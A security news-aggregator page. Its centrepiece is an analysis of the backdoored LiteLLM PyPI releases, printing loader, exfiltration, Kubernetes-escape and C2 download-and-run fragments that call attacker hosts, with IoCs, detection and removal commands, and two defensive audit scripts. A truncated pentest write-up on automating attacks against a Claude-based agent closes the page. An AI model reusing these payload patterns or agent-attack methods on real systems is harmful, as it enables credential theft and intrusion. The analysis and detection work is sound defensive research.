Technology

Related News

Grounded Intelligence Is Key to Safe AI Software Development at Scale

  • Published date: 2026-03-25 00:00:00


<div class="hs-featured-image-wrapper"> <a href="https://www.sonatype.com/blog/grounded-intelligence-is-key-to-safe-ai-software-development-at-scale" title="" class="hs-featured-image-link"> <img decoding="async" src="https://www.sonatype.com/hubfs/blog_grounded_intelligence.jpg" alt="Image of a hexagon shape with yellow outline with an icon representing a human head at the center" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"> </a> </div>
<p>One experience has become nearly universal as <a href="https://www.sonatype.com/resources?category=186977656491">AI systems</a> move deeper into software development: their confidence when they’re wrong.</p>
<p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.sonatype.com/blog">2024 Sonatype Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Aaron Linskens">Aaron Linskens</a>. Read the original post at: <a href="https://www.sonatype.com/blog/grounded-intelligence-is-key-to-safe-ai-software-development-at-scale">https://www.sonatype.com/blog/grounded-intelligence-is-key-to-safe-ai-software-development-at-scale</a></p>

Entro Security Launches AGA to Govern AI Agents and Non-Human Identities Across the Enterprise

  • Published date: 2026-03-25 00:00:00


<p>Entro Security has announced Agentic Governance &amp; Administration (AGA), a new pillar of its platform designed to help security and identity teams govern AI agents and AI access paths across enterprise systems. The company is showcasing AGA at RSA Conference 2026.</p>
<p>The core problem AGA addresses is one that traditional Identity Governance and Administration (IGA) tools weren’t built to solve. Existing IGA platforms govern people and applications, but agentic AI operates differently. The “user” is often an AI service or locally running agent. Access paths run through non-human identities: tokens, service accounts, API keys, and secrets. And the blast radius is shaped by OAuth scopes, integrations, and automation, not a single human login.</p>
<p>“Enterprise AI adoption rarely starts with a strategy deck. It starts with a connection,” said Itzik Alvas, Co-Founder and CEO of Entro Security. “A developer connects a tool to an LLM, a team installs an AI app in SaaS, or someone authenticates an agent against SharePoint, GitHub, Salesforce, or internal APIs. It works, spreads fast, and then security teams get questions they can’t answer fast enough. Who connected what, to which systems, with what permissions, and using which identities? Our AGA helps teams regain clarity and control as AI access becomes the default.”</p>
<p>AGA applies the same governance fundamentals that IAM teams already know, adapted for a world where agents connect in seconds, operate continuously, and drift as adoption spreads. The capability covers inventory, ownership, least privilege, auditability, and enforcement, applied to AI assistants, agent platforms, and locally running agents.</p>
<p>On the technical side, AGA builds a structured profile for each AI agent by pulling from three layers: sources (endpoint telemetry, agent foundries, cloud environments, MCP servers), targets (enterprise assets and applications the agent touches), and identities (human, non-human, or secret identities used to access those targets).</p>
<p>Two core capabilities sit on top of that foundation. Shadow AI Discovery uses EDR integrations to surface AI clients and local agent runtimes on workstations, and connects natively with agent foundries including AWS Bedrock and Copilot Studio to discover agents and the non-human identities they rely on. AI Agents Monitoring and Enforcement adds MCP activity visibility and policy controls, giving teams audit trails of allowed and blocked activity and controls to reduce sensitive data and secret exposure.</p>
<p>AGA is available now as part of the Entro platform.</p>

Tributes for Mel Schilling, who died of Australia's deadliest cancer

  • Shari Hams
  • Published date: 2026-03-24 23:49:05

Mel Schilling became one of Australian TV’s most recognised relationship experts, but who was she, and what led to her death?

Mel Schilling emerged as one of Australian television's most recognisable relationship experts. On Tuesday, she died of bowel cancer at the age of 54. As a judge on the hit reality show Married At … [+5692 chars]

Equipping leaders to tackle an evolving digital security landscape

  • Published date: 2026-03-24 01:27:05

Newcastle Australia Institute of Higher Education’s new Master of Cyber Security pairs technical depth with human factors, ethics and governance to cultivate interdisciplinary skills for leadership roles.

Newcastle Australia's newly launched Master of Cyber Security, currently offered part-time, is designed to build that breadth and depth. The programme prepares professionals for roles such as security a… [+1859 chars]

TeamPCP Supply Chain Attack Part 2: LiteLLM PyPI Credential Stealer

  • Published date: 2026-03-24 00:00:00


<p><strong>Last Updated:</strong> March 24, 2026 – 1:15 PM ET</p>
<p>Part 1 covered CanisterWorm, the self-spreading npm worm. This post covers the next wave: a malicious LiteLLM PyPI package carrying the most capable credential stealer TeamPCP has deployed yet.</p>
<p>On March 24, 2026, two versions of <code>litellm</code>, one of the most widely used Python libraries for working with AI language model APIs, were published to PyPI carrying a hidden credential stealer. Versions <code>1.82.7</code> and <code>1.82.8</code> never appeared on the official LiteLLM GitHub repository. They were published directly to PyPI using credentials stolen from a maintainer account, which TeamPCP obtained as part of their ongoing cascade of supply chain compromises.</p>
<h2 class="wp-block-heading" id="how-teampcp-got-into-litellm"><strong>How TeamPCP got into LiteLLM</strong></h2>
<p>To understand this attack, you need to follow the credential chain back four days.</p>
<p>On March 19, TeamPCP force-pushed malicious commits over 75 of 76 version tags of <code>aquasecurity/trivy-action</code> and poisoned Trivy release <code>v0.69.4</code>. Any CI/CD pipeline that ran Trivy that day had its secrets harvested and exfiltrated to the attacker.</p>
<p>LiteLLM’s CI pipeline (<code>ci_cd/security_scans.sh</code>) installed Trivy via apt without pinning a version. When the pipeline ran on March 23, it pulled the poisoned Trivy build. The stealer inside Trivy ran inside LiteLLM’s CI environment, collected everything, including <code>PYPI_PUBLISH_PASSWORD</code> for the krrishdholakia maintainer account, and shipped it to <code>checkmarx.zone</code>.</p>
<p>On March 23, TeamPCP also compromised <code>checkmarx/kics-github-action</code> (all 35 tags hijacked) and <code>checkmarx/ast-github-action</code> (version 2.3.28 poisoned), expanding their credential collection to every pipeline that used Checkmarx scanning. The litellm.cloud domain was registered the same day.</p>
<p>By March 24 they had everything they needed. Two malicious LiteLLM versions hit PyPI within hours of each other.</p>
<h2 class="wp-block-heading" id="what-changed-between-1-82-7-and-1-82-8"><strong>What changed between 1.82.7 and 1.82.8</strong></h2>
<p>The two versions represent a deliberate escalation in how the payload triggers.</p>
<p><strong>Version 1.82.7</strong> hid the malicious code inside <code>litellm/proxy/proxy_server.py</code>. The payload only ran when a developer or application explicitly imported <code>litellm.proxy</code>, a common path when running the LiteLLM proxy server, but not universal.</p>
<p><strong>Version 1.82.8</strong> moved the same payload into a file named <code>litellm_init.pth</code> placed in the package’s site-packages directory. This changes everything. Python’s <code>site</code> module processes every <code>.pth</code> file in site-packages on startup, executing any line that begins with <code>import</code>. No import statement is needed in application code. No user interaction. <strong>The payload fires every time Python starts on the infected machine</strong>, regardless of whether LiteLLM is ever used.</p>
<p>The upgrade from a module-level hook to a <code>.pth</code>-level hook is significant: it means the malware persists and re-runs even after the malicious package is uninstalled, as long as the <code>.pth</code> file remains in site-packages.</p>
<h2 class="wp-block-heading" id="technical-analysis"><strong>Technical analysis</strong></h2>
<h3 class="wp-block-heading" id="three-layers-one-goal"><strong>Three layers, one goal</strong></h3>
<p>The payload uses three nested layers of base64 encoding to obscure its code from static scanners.</p>
<pre class="wp-block-code"><code>import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('&lt;blob&gt;'))"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)</code></pre>
<p><sub><strong>Figure 1:</strong> Outer <code>.pth</code> execution — fires on every Python startup with no user action</sub></p>
<p>Decoding the blob reveals the orchestrator script, which holds an embedded RSA-2048 public key and a second base64-encoded payload (the harvester). The orchestrator runs the harvester as a subprocess, captures everything it prints to stdout, encrypts the output, and ships it out.</p>
<pre class="wp-block-code"><code>subprocess.run(["openssl", "rand", "-out", sk, "32"])
subprocess.run(["openssl", "enc", "-aes-256-cbc", "-in", collected,
    "-out", ef, "-pass", f"file:{sk}", "-pbkdf2"])
subprocess.run(["openssl", "pkeyutl", "-encrypt", "-pubin",
    "-inkey", pk, "-in", sk, "-out", ek,
    "-pkeyopt", "rsa_padding_mode:oaep"])
# bundles as tpcp.tar.gz, POSTs to models.litellm.cloud</code></pre>
<p><sub><strong>Figure 2:</strong> Encryption and exfiltration pipeline — output is encrypted before leaving the machine</sub></p>
<p>The data is AES-256-CBC encrypted with a random session key. The session key is RSA-OAEP encrypted with the attacker’s public key. Only the attacker can decrypt what was stolen. The archive is named <code>tpcp.tar.gz</code>, a direct self-reference by TeamPCP.</p>
<h3 class="wp-block-heading" id="the-credential-harvester"><strong>The credential harvester</strong></h3>
<p>The second-stage script is an exhaustive credential collector. In plain terms: it reads every file on the system that could contain a password, token, or private key, and sends all of it.</p>
<p>It specifically targets:</p>
<ul class="wp-block-list">
<li><strong>SSH keys</strong> – all key types, authorized_keys, known_hosts, host keys from <code>/etc/ssh</code></li>
<li><strong>AWS credentials</strong> – environment variables, <code>~/.aws/credentials</code>, and live queries to the EC2 Instance Metadata Service (IMDS) to steal IAM role credentials</li>
<li><strong>Kubernetes</strong> – service account tokens, <code>~/.kube/config</code>, all secrets across all namespaces via the K8s API</li>
<li><strong>GCP and Azure</strong> – application default credentials, <code>~/.azure</code> directory contents</li>
<li><strong>Docker</strong> – <code>config.json</code> including registry tokens, Kaniko build credentials</li>
<li><strong>npm tokens</strong> – <code>~/.npmrc</code> (connecting directly to the npm side of this campaign)</li>
<li><strong>Database configs</strong> – <code>.pgpass</code>, <code>.my.cnf</code>, <code>redis.conf</code>, <code>.mongorc.js</code></li>
<li><strong>Environment files</strong> – <code>.env</code>, <code>.env.production</code>, <code>.env.staging</code>, searched recursively to depth 6 across <code>/home</code>, <code>/opt</code>, <code>/srv</code>, <code>/var/www</code>, <code>/app</code>, <code>/data</code>, <code>/tmp</code></li>
<li><strong>Cryptocurrency wallets</strong> – Bitcoin, Ethereum keystores, Solana validator keypairs, Cardano signing keys, Zcash, Ripple, Litecoin, Dogecoin</li>
<li><strong>TLS/SSL private keys</strong> – <code>*.pem</code>, <code>*.key</code>, <code>*.p12</code>, <code>*.pfx</code>, Let’s Encrypt certs</li>
<li><strong>CI/CD secrets</strong> – <code>terraform.tfvars</code>, <code>terraform.tfstate</code>, Jenkinsfile, <code>.travis.yml</code>, <code>.gitlab-ci.yml</code>, <code>.drone.yml</code></li>
<li><strong>System information</strong> – hostname, username, full <code>printenv</code>, <code>/etc/passwd</code>, <code>/etc/shadow</code>, SSH login history</li>
</ul>
<p>It also queries AWS Secrets Manager and SSM Parameter Store directly using any AWS credentials it finds.</p>
<h3 class="wp-block-heading" id="kubernetes-cluster-escape"><strong>Kubernetes cluster escape</strong></h3>
<p>If the infected machine is running inside a Kubernetes pod with a service account token at <code>/var/run/secrets/kubernetes.io/serviceaccount/token</code>, the harvester escalates:</p>
<pre class="wp-block-code"><code>pod_manifest = {
    'spec': {
        'hostPID': True, 'hostNetwork': True,
        'tolerations': [{'operator': 'Exists'}],
        'containers': [{
            'image': 'alpine:latest',
            'command': ['sh', '-c', drop_cmd],
            'securityContext': {'privileged': True},
            'volumeMounts': [{'name': 'host', 'mountPath': '/host'}]
        }],
        'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}]
    }
}
k8s_post('/api/v1/namespaces/kube-system/pods', pod_manifest)</code></pre>
<p><sub><strong>Figure 3:</strong> Privileged pod manifest deployed to every cluster node; it mounts the host filesystem and chroots into it</sub></p>
<p>It enumerates every node in the cluster and deploys this pod to each one. The pod mounts <code>/</code> from the host and uses <code>chroot</code> to install the backdoor directly onto the underlying node, outside the container boundary.</p>
<h3 class="wp-block-heading" id="persistence-backdoor"><strong>Persistence backdoor</strong></h3>
<p>After exfiltration, the harvester drops a polling backdoor to <code>~/.config/sysmon/sysmon.py</code> and registers it as a systemd user service (<code>sysmon.service</code>). The backdoor checks <code>https://checkmarx.zone/raw</code> every 50 minutes for a URL, downloads whatever binary it points to, writes it to <code>/tmp/pglog</code>, and executes it.</p>
<pre class="wp-block-code"><code>C_URL   = "https://checkmarx.zone/raw"
TARGET  = "/tmp/pglog"
STATE   = "/tmp/.pg_state"
time.sleep(300)   # 5-minute sandbox evasion delay
while True:
    l = g()       # fetch URL from C2
    if l and l != prev and "youtube.com" not in l:
        e(l)      # download and execute
    time.sleep(3000)</code></pre>
<p><sub><strong>Figure 4:</strong> C2 polling loop with YouTube kill-switch — identical logic to CanisterWorm’s pgmon backdoor</sub></p>
<p>The <code>youtube.com</code> kill-switch, the <code>/tmp/pglog</code> target path, the <code>/tmp/.pg_state</code> state file, and the 300/3000 second timing are <strong>identical</strong> to the backdoor deployed by CanisterWorm on npm. This is the same codebase, the same actor.</p>
<h2 class="wp-block-heading" id="attribution-same-actor-bigger-payload"><strong>Attribution: Same actor, bigger payload</strong></h2>
<p>The connection to TeamPCP and CanisterWorm is direct:</p>
<figure class="wp-block-table"><table class="has-fixed-layout">
<thead><tr><th><strong>Indicator</strong></th><th><strong>This malware</strong></th><th><strong>CanisterWorm (npm)</strong></th></tr></thead>
<tbody>
<tr><td>Exfil archive</td><td><code>tpcp.tar.gz</code></td><td>actor name “TeamPCP”</td></tr>
<tr><td>C2 state file</td><td><code>/tmp/.pg_state</code></td><td><code>/tmp/.pg_state</code></td></tr>
<tr><td>C2 payload target</td><td><code>/tmp/pglog</code></td><td><code>/tmp/pglog</code></td></tr>
<tr><td>Backdoor poll interval</td><td>3000 seconds</td><td>3000 seconds</td></tr>
<tr><td>Startup delay</td><td>300 seconds</td><td>300 seconds</td></tr>
<tr><td>Kill-switch</td><td><code>youtube.com not in url</code></td><td><code>youtube.com not in url</code></td></tr>
<tr><td>Persistence mechanism</td><td>systemd user service</td><td>systemd user service</td></tr>
</tbody></table></figure>
<p>The LiteLLM payload is a significant capability upgrade over CanisterWorm. Where CanisterWorm’s Python backdoor slot held a placeholder (<code>hello123</code>), this is the real thing: a production-grade stealer with AWS API integration, K8s cluster escape, cryptocurrency wallet enumeration, and RSA-encrypted exfiltration.</p>
<h2 class="wp-block-heading" id="indicators-of-compromise"><strong>Indicators of compromise</strong></h2>
<h3 class="wp-block-heading" id="network"><strong>Network</strong></h3>
<figure class="wp-block-table"><table class="has-fixed-layout">
<thead><tr><th><strong>Indicator</strong></th><th><strong>Purpose</strong></th></tr></thead>
<tbody>
<tr><td><code>hxxps://models.litellm[.]cloud/</code></td><td>Exfiltration endpoint</td></tr>
<tr><td><code>hxxps://checkmarx[.]zone/raw</code></td><td>C2 polling for payload URL</td></tr>
<tr><td><code>hxxp://169.254.169.254/latest/meta-data/iam/security-credentials/</code></td><td>AWS IMDS credential theft</td></tr>
</tbody></table></figure>
<h3 class="wp-block-heading" id="filesystem"><strong>Filesystem</strong></h3>
<figure class="wp-block-table"><table class="has-fixed-layout">
<thead><tr><th><strong>Path</strong></th><th><strong>Description</strong></th></tr></thead>
<tbody>
<tr><td><code>~/.config/sysmon/sysmon.py</code></td><td>Persistent C2 backdoor</td></tr>
<tr><td><code>~/.config/systemd/user/sysmon.service</code></td><td>Systemd persistence unit</td></tr>
<tr><td><code>/tmp/pglog</code></td><td>Downloaded payload binary</td></tr>
<tr><td><code>/tmp/.pg_state</code></td><td>C2 state tracking</td></tr>
<tr><td><code>litellm_init.pth</code> in site-packages</td><td>Malicious <code>.pth</code> loader (v1.82.8)</td></tr>
</tbody></table></figure>
<h3 class="wp-block-heading" id="kubernetes"><strong>Kubernetes</strong></h3>
<ul class="wp-block-list">
<li>Pods named <code>node-setup-*</code> in namespace <code>kube-system</code></li>
<li>Created with <code>hostPID: true, hostNetwork: true, privileged: true</code></li>
</ul>
<h3 class="wp-block-heading" id="cryptographic"><strong>Cryptographic</strong></h3>
<ul class="wp-block-list">
<li>RSA-2048 attacker public key fingerprint (embedded in payload): <code>vahaZDo8mucujrT15ry+08qNLwm3kxzFSMj84M16lmIEeQA8u1X8DGK0...</code></li>
</ul>
<h2 class="wp-block-heading" id="detection"><strong>Detection</strong></h2>
<h3 class="wp-block-heading" id="check-for-active-infection"><strong>Check for active infection</strong></h3>
<pre class="wp-block-code"><code># Check for backdoor service
systemctl --user status sysmon.service
# Check for backdoor script and C2 artifacts
ls -la ~/.config/sysmon/sysmon.py
ls -la ~/.config/systemd/user/sysmon.service
ls -la /tmp/pglog /tmp/.pg_state
# Check for malicious .pth in all Python environments
find $(python3 -c "import site; print('\n'.join(site.getsitepackages()))") \
  -name "*.pth" | xargs grep -l "subprocess.Popen" 2&gt;/dev/null
# Check for K8s escape pods
kubectl get pods -n kube-system | grep node-setup</code></pre>
<p><sub><strong>Figure 5:</strong> Detection commands for the sysmon backdoor and associated artifacts</sub></p>
<h3 class="wp-block-heading" id="remove-the-backdoor"><strong>Remove the backdoor</strong></h3>
<pre class="wp-block-code"><code>systemctl --user stop sysmon.service
systemctl --user disable sysmon.service
rm -f ~/.config/systemd/user/sysmon.service
rm -rf ~/.config/sysmon/
rm -f /tmp/pglog /tmp/.pg_state
systemctl --user daemon-reload
# Remove malicious .pth file
pip uninstall litellm
# also manually verify .pth is gone from site-packages</code></pre>
<p><sub><strong>Figure 6:</strong> Remediation steps for infected hosts</sub></p>
<h3 class="wp-block-heading" id="rotate-credentials-immediately"><strong>Rotate credentials immediately</strong></h3>
<p>Any machine that had Python start with <code>litellm</code> 1.82.7 or 1.82.8 installed must be treated as fully compromised. Rotate: AWS IAM keys, SSH keys, npm tokens, database passwords, Kubernetes service account tokens, Docker registry credentials, and any cloud provider credentials present in environment variables or config files.</p>
<h2 class="wp-block-heading" id="conclusion"><strong>Conclusion</strong></h2>
<p>The LiteLLM attack is the third major wave in TeamPCP’s March 2026 campaign. Trivy provided initial access. CanisterWorm spread through the npm ecosystem. Now a malicious PyPI package reaches a different but overlapping audience: AI and ML developers who use LiteLLM to integrate language models into applications. These pipelines routinely have access to cloud credentials, model API keys, and production infrastructure.</p>
<p>The upgrade from npm to PyPI, and from module-level hooks to <code>.pth</code> auto-execution, shows an actor that is actively evolving its delivery mechanisms across ecosystems while keeping the same core payload and infrastructure.</p>
<p>PyPI has quarantined the affected versions. If you are running LiteLLM, verify your installed version (<code>pip show litellm</code>) and upgrade to a clean release. If you were running 1.82.7 or 1.82.8 at any point, assume compromise and rotate all credentials.</p>
<p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.mend.io">Mend</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Tom Abai">Tom Abai</a>. Read the original post at: <a href="https://www.mend.io/blog/teampcp-supply-chain-series-part-2/">https://www.mend.io/blog/teampcp-supply-chain-series-part-2/</a></p>
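The `.pth` mechanism the Mend post describes is why the 1.82.8 payload runs on every interpreter start, and the `find ... | grep subprocess.Popen` check in Figure 5 only catches lines that contain that literal string. The script below is an added example, not code from the post or from LiteLLM: it applies CPython's own rule for which `.pth` lines are executed (a line beginning with `import` followed by a space or tab is passed to `exec()`, `#` lines and blank lines are skipped, everything else is a path) to every site-packages directory of the running interpreter, reports every executable line, and flags those that reach for process spawning, dynamic execution or decoding. It goes beyond the page's single-pattern grep by listing all executable lines, so a hook that avoids the exact text `subprocess.Popen` is still reported. The risky-token list, the two sample files written by `demo()` and the `<blob>` placeholder are constructed for this example.

```python
"""Audit .pth files for lines the interpreter will execute at startup.

At startup, site.addpackage() reads every *.pth file in each site-packages
directory. A line that begins with "import" followed by a space or tab is
passed to exec(); a line starting with "#" or a blank line is skipped;
anything else is appended to sys.path as a path. This tool lists every
executable line, whatever it contains, and flags the ones that use process
spawning, dynamic execution or decoding, which legitimate startup hooks
almost never need.
"""
import os
import shutil
import site
import sys
import tempfile
from dataclasses import dataclass

# Substrings rarely needed in a legitimate .pth hook. Constructed for this
# example; extend to taste.
RISKY_TOKENS = ("subprocess", "os.system", "os.popen", "exec(", "eval(",
                "compile(", "base64", "urllib", "requests", "socket")


@dataclass
class PthFinding:
    path: str      # the .pth file
    lineno: int    # 1-based line number inside that file
    line: str      # the executable line, verbatim
    risky: tuple   # RISKY_TOKENS present in the line; empty means none matched


def classify_line(line):
    """Classify one .pth line the way CPython's site.addpackage does."""
    if not line.strip():
        return "blank"
    if line.startswith("#"):
        return "comment"
    if line.startswith(("import ", "import\t")):
        return "exec"          # this line is handed to exec() at startup
    return "path"              # treated as a sys.path entry


def audit_pth_dirs(dirs):
    """Scan every *.pth under each directory; return a list of PthFinding."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if not name.endswith(".pth"):
                continue
            full = os.path.join(d, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                for lineno, raw in enumerate(fh, 1):
                    line = raw.rstrip("\r\n")
                    if classify_line(line) != "exec":
                        continue
                    hits = tuple(t for t in RISKY_TOKENS if t in line)
                    findings.append(PthFinding(full, lineno, line, hits))
    return findings


def default_site_dirs():
    """Every directory in which the running interpreter processes .pth files."""
    dirs = list(site.getsitepackages())
    if site.ENABLE_USER_SITE:
        dirs.append(site.getusersitepackages())
    return dirs


def demo():
    """Run the audit over a throwaway directory holding two constructed files.

    The hostile file copies the shape of Figure 1 with a placeholder blob; it
    is only read, never executed, and the directory is deleted afterwards.
    """
    tmp = tempfile.mkdtemp(prefix="pth-audit-")
    try:
        # Benign hook, shaped like the ones editable installs emit.
        with open(os.path.join(tmp, "_editable_demo.pth"), "w") as fh:
            fh.write("import _demo_finder; _demo_finder.install()\n")
        with open(os.path.join(tmp, "litellm_init.pth"), "w") as fh:
            fh.write("# a comment line is skipped\n")
            fh.write("/some/path/entry\n")
            fh.write('import os, subprocess, sys; subprocess.Popen([sys.executable, '
                     '"-c", "import base64; exec(base64.b64decode(\'<blob>\'))"], '
                     'stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n')
        return audit_pth_dirs([tmp])
    finally:
        shutil.rmtree(tmp, ignore_errors=True)


if __name__ == "__main__":
    # Usage: python pth_audit.py [DIR ...]   (no args: this interpreter's dirs)
    #        python pth_audit.py --demo      (constructed sample only)
    if "--demo" in sys.argv:
        results = demo()
    else:
        results = audit_pth_dirs(sys.argv[1:] or default_site_dirs())
    for f in results:
        tag = "SUSPICIOUS" if f.risky else "exec"
        print(f"[{tag}] {f.path}:{f.lineno}: {f.line}")
```

Run it under each interpreter you care about (a virtualenv's Python processes its own site-packages, not the system one), since `site.getsitepackages()` answers only for the interpreter that is executing. Any `exec` line deserves a look, flagged or not; legitimate ones are short and name a module that is installed in the same environment.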
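The manifest in Figure 3 and the Kubernetes indicators in the IoC list describe one shape: a privileged pod with host PID and network namespaces, a `hostPath` mount of `/`, a blanket toleration, created in `kube-system` under a `node-setup-*` name. The script below is an added example, not code from the Mend post: it takes a Pod or PodList as JSON (for instance the output of `kubectl get pods -A -o json`) and reports which of those properties each pod has, with `is_node_escape()` separating the strong signal (a privileged container that mounts the host root or shares the host PID namespace) from the weak one (name and namespace, which an attacker can change at will). The two embedded manifests are constructed samples; `drop_cmd` appears only as a placeholder string.

```python
"""Audit pod manifests for the node-escape shape shown in Figure 3.

Reads a Pod or PodList as JSON (e.g. `kubectl get pods -A -o json`) and
reports, per pod, which risky properties are set: hostPID, hostNetwork, a
privileged container, a hostPath volume rooted at "/" that is actually
mounted, a blanket toleration, the kube-system namespace and the
node-setup-* name prefix from the IoC list.
"""
import json
import sys


def pod_findings(pod):
    """Return one string per risky property found on the pod."""
    meta = pod.get("metadata") or {}
    spec = pod.get("spec") or {}
    findings = []

    name = meta.get("name") or meta.get("generateName") or ""
    if meta.get("namespace") == "kube-system":
        findings.append("namespace: kube-system")
    if name.startswith("node-setup-"):
        findings.append(f"name matches node-setup-*: {name}")
    if spec.get("hostPID"):
        findings.append("hostPID: true")
    if spec.get("hostNetwork"):
        findings.append("hostNetwork: true")
    for tol in spec.get("tolerations") or []:
        # operator: Exists with no key tolerates every taint, so the pod can
        # land on control-plane and cordoned nodes as well.
        if tol.get("operator") == "Exists" and not tol.get("key"):
            findings.append("blanket toleration (operator: Exists, no key)")

    # Volumes exposing the host root; only a container that mounts one counts.
    host_root_volumes = {
        v.get("name")
        for v in spec.get("volumes") or []
        if (v.get("hostPath") or {}).get("path") == "/"
    }
    for c in (spec.get("containers") or []) + (spec.get("initContainers") or []):
        cname = c.get("name") or c.get("image") or "?"
        if (c.get("securityContext") or {}).get("privileged"):
            findings.append(f"container {cname}: privileged: true")
        for vm in c.get("volumeMounts") or []:
            if vm.get("name") in host_root_volumes:
                findings.append(f"container {cname}: mounts host / at {vm.get('mountPath')}")
    return findings


def is_node_escape(pod):
    """True when the pod can reach the node, not merely its own container.

    A privileged container that mounts the host root (chroot-able) or runs in
    the host PID namespace counts as an escape regardless of its name.
    """
    f = pod_findings(pod)
    privileged = any("privileged: true" in x for x in f)
    host_root = any("mounts host /" in x for x in f)
    return privileged and (host_root or "hostPID: true" in f)


def audit(doc):
    """Accept a Pod or PodList dict; return {namespace/name: findings}."""
    pods = doc.get("items") or [] if doc.get("kind") == "PodList" else [doc]
    out = {}
    for pod in pods:
        meta = pod.get("metadata") or {}
        key = f"{meta.get('namespace', '?')}/{meta.get('name') or meta.get('generateName', '?')}"
        out[key] = pod_findings(pod)
    return out


# Constructed sample: the Figure 3 spec plus metadata matching the IoC list.
# Not a real pod from any cluster; the command is a placeholder.
ESCAPE_POD = {
    "kind": "Pod",
    "metadata": {"name": "node-setup-x7k2q", "namespace": "kube-system"},
    "spec": {
        "hostPID": True, "hostNetwork": True,
        "tolerations": [{"operator": "Exists"}],
        "containers": [{
            "name": "setup", "image": "alpine:latest",
            "command": ["sh", "-c", "<drop_cmd placeholder>"],
            "securityContext": {"privileged": True},
            "volumeMounts": [{"name": "host", "mountPath": "/host"}],
        }],
        "volumes": [{"name": "host", "hostPath": {"path": "/"}}],
    },
}

# Constructed benign comparison: a hostPath volume that is not the root,
# mounted read-only, with no host namespaces and no privilege.
BENIGN_POD = {
    "kind": "Pod",
    "metadata": {"name": "log-shipper-abc12", "namespace": "logging"},
    "spec": {
        "containers": [{
            "name": "shipper", "image": "fluentd:placeholder",
            "volumeMounts": [{"name": "logs", "mountPath": "/var/log", "readOnly": True}],
        }],
        "volumes": [{"name": "logs", "hostPath": {"path": "/var/log"}}],
    },
}

if __name__ == "__main__":
    # Usage: kubectl get pods -A -o json | python pod_audit.py --stdin
    #        python pod_audit.py            (constructed samples only)
    if "--stdin" in sys.argv:
        doc = json.load(sys.stdin)
    else:
        doc = {"kind": "PodList", "items": [ESCAPE_POD, BENIGN_POD]}
    for key, findings in audit(doc).items():
        print(f"{key}: {'; '.join(findings) or 'no findings'}")
```

The strong signal is the one to alert on: a pod that is privileged and mounts `/` from the host is a node escape whether or not it is called `node-setup-*`, and a pod that merely sits in `kube-system` is not. The same checks express naturally as an admission policy, which stops the pod being created at all instead of finding it afterwards.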

Which Came First: The System Prompt, or the RCE?

  • Published date: 2026-03-24 00:00:00


<div data-elementor-type="wp-post" data-elementor-id="10919" class="elementor elementor-10919" data-elementor-post-type="post"> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-c6eba17 e-con-full e-flex e-con e-parent" data-id="c6eba17" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-737af17 elementor-widget elementor-widget-text-editor" data-id="737af17" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
<p>During a recent penetration test, we came across an AI-powered desktop application that acted as a bridge between Claude (Opus 4.5) and a third-party asset management platform. The idea is simple: instead of clicking through dashboards and making API calls, users just ask the agent to do it for them. “How many open tickets do we have?” “Update this record.” That kind of thing.</p>
<p>The agent ran inside a sandboxed environment, and the client was confident in their controls. Rigid system prompts (even prepended to each message), deterministic hooks in place to prevent accidental disclosure, and so on. To their credit, those controls held up; we just found another way to do what we wanted.</p>
<h3><strong>Automating the Recon</strong></h3>
<p>Manual LLM testing is a drag. You’re sitting there typing prompts one at a time, waiting for responses, trying to keep track of what worked and what didn’t. It’s tedious, and it doesn’t scale.</p>
<p>Our go-to approach is to get another LLM to do the dirty work. For this engagement, the target was accessible via an Electron desktop application, meaning you could launch it in debug mode and access the app’s DOM tree directly. 
We wrote a Python script that could interact with the target directly, gave it to Claude (alongside our <a href="https://github.com/praetorian-inc/augustus/">Augustus LLM testing methodology</a>), and let it run.</p> <p>This essentially meant we had Claude talking to another version of itself. Back and forth, hundreds of times, working through the Augustus attack paths automatically:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-f626292 e-con-full e-flex e-con e-parent" data-id="f626292" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-639fe4d elementor-widget elementor-widget-image" data-id="639fe4d" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img fetchpriority="high" decoding="async" width="1224" height="241" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1.webp" class="attachment-full size-full wp-image-10911" alt="Terminal showing Python script execution where AI refuses PowerPoint creation request, followed by thinking notes about the refusal" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1.webp 1224w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1-300x59.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1-1024x202.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1-768x151.webp 768w" sizes="(max-width: 1224px) 100vw, 1224px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-839c426 e-con-full e-flex e-con e-parent" data-id="839c426" 
